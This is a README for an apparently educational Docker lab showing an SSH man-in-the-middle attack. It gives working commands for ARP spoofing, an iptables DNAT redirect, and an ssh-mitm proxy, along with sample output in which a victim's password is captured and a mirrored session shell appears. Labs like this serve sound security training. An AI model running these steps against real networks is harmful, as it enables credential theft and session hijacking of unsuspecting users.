OFFICIAL DOCUMENATION IS AT www.rootandbeer.com/labs/ssh-mitm. Please visit the website for the most up-to-date documentation on this lab.
| Repo | ⭐ Please give a Star if you enjoyed this lab ⭐ |
|---|---|
| Downloads |  |
| Stars |  |
| Prerequisites | Docker-ce, SSH-MITM, arpspoof |
| Difficulty |  |
This lab demonstrates how to perform a Man-in-the-Middle (MITM) attack on SSH connections using ARP spoofing and SSH-MITM. You will learn to intercept SSH traffic between a client and server, redirecting it through a proxy to capture credentials and monitor sessions in real-time. The lab uses Docker containers to create a controlled network environment for ethical security testing.
| Description | Hostname | IP Address | USERNAME:PASSWORD |
|---|---|---|---|
| Gateway | 172.25.0.1 | ||
| SSH Server (Target) | ssh-server | 172.25.0.10 | admin:P@assw0rd123 |
| Victim Client | victim-client | 172.25.0.20 | targetuser:supersecret |
Clone the repository:
git clone http://www.github.com/rootandbeer/ssh-mitm-lab
cd ssh-mitm
Start the target environment:
sudo docker compose up -d
# Wait for services to initialize
Create and Launch Python VENV:
python3 -m venv ~/.venv/ssh-mitm
source ~/.venv/ssh-mitm/bin/activate
Install ssh-mitm
python3 -m pip install "ssh-mitm[production]"Identify the Docker bridge interface:
# Find Docker bridge interface
export BRIDGE="br-$(sudo docker network ls | awk '/mitm_network/ {print $1}')"
echo "Bridge: $BRIDGE"[!warning] Most networks will use
eth0(useifconfigto verify in real world applications), however since this lab is done in Docker, we have to find the specific Docker bridge interface.
Enable IP forwarding:
sudo sysctl -w net.ipv4.ip_forward=1
Verify the change:
cat /proc/sys/net/ipv4/ip_forward # Should show: 1
Redirect SSH traffic to the ssh-mitm proxy:
sudo iptables -t nat -A PREROUTING -i "$BRIDGE" -p tcp -d 172.25.0.10 --dport 22 -j DNAT --to-destination 172.25.0.1:22
Verify the iptables rule was added:
sudo iptables -t nat -L PREROUTING -n -vThis attack simulation uses 3 terminals
[!note] Terminal 1 - Start the SSH MITM proxy
Basic configuration:
ssh-mitm server \ --remote-host 172.25.0.10 \ --listen-port 22 \ --listen-address 172.25.0.1
[!important] Terminal 2 - Start ARP spoofing:
Keep this terminal running continuously throughout the attack
sudo arpspoof -i $BRIDGE -t 172.25.0.20 172.25.0.10
[!warning] Terminal 3 - Simulate victim SSH connection
Access the victim container:
sudo docker exec -it victim-client bash
From inside the container, connect to the SSH server:ssh targetuser@172.25.0.10 # When prompted, enter password: supersecret
Watch Terminal 1 (ssh-mitm output) for captured credentials:
[01/03/26 15:14:14] INFO Remote authentication succeeded
Remote Address: 172.25.0.10:22
Username: targetuser
Password: supersecret
Agent: no agent
INFO ℹ
265e4691-d19b-4826-a32c-4b140920a30c
[0m - local port forwarding
SOCKS port: 39407
SOCKS4:
* socat: socat
TCP-LISTEN:LISTEN_PORT,fork
socks4:127.0.0.1:DESTINATION_ADDR:DESTINATION_PORT,socksport=39407
* netcat: nc -X 4 -x
localhost:39407 address port
SOCKS5:
* netcat: nc -X 5 -x
localhost:39407 address port
[01/03/26 15:14:15] INFO ℹ
265e4691-d19b-4826-a32c-4b140920a30c
[0m - session started
INFO ℹ created mirrorshell on port 38099. connect
with: ssh -p 38099 127.0.0.1 Terminal 4 - Capture traffic for analysis:
Start capturing SSH traffic:
sudo tcpdump -i $BRIDGE -w /tmp/ssh-mitm.pcap "host 172.25.0.20 and port 22"
Analyze the captured packets:
# View packet contents in ASCII
tcpdump -r /tmp/ssh-mitm.pcap -A
# Open in Wireshark for detailed analysis
wireshark /tmp/ssh-mitm.pcapRemove the specific PREROUTING rule:
sudo iptables -t nat -D PREROUTING -i "$BRIDGE" -p tcp -d 172.25.0.10 --dport 22 -j DNAT --to-destination 172.25.0.1:22
Alternatively, flush all NAT rules (use with caution):
sudo iptables -t nat -FDisable IP forwarding:
sudo sysctl -w net.ipv4.ip_forward=0
Stop and remove the Docker containers:
sudo docker compose down
⭐ Please give a Star if you enjoyed this lab ⭐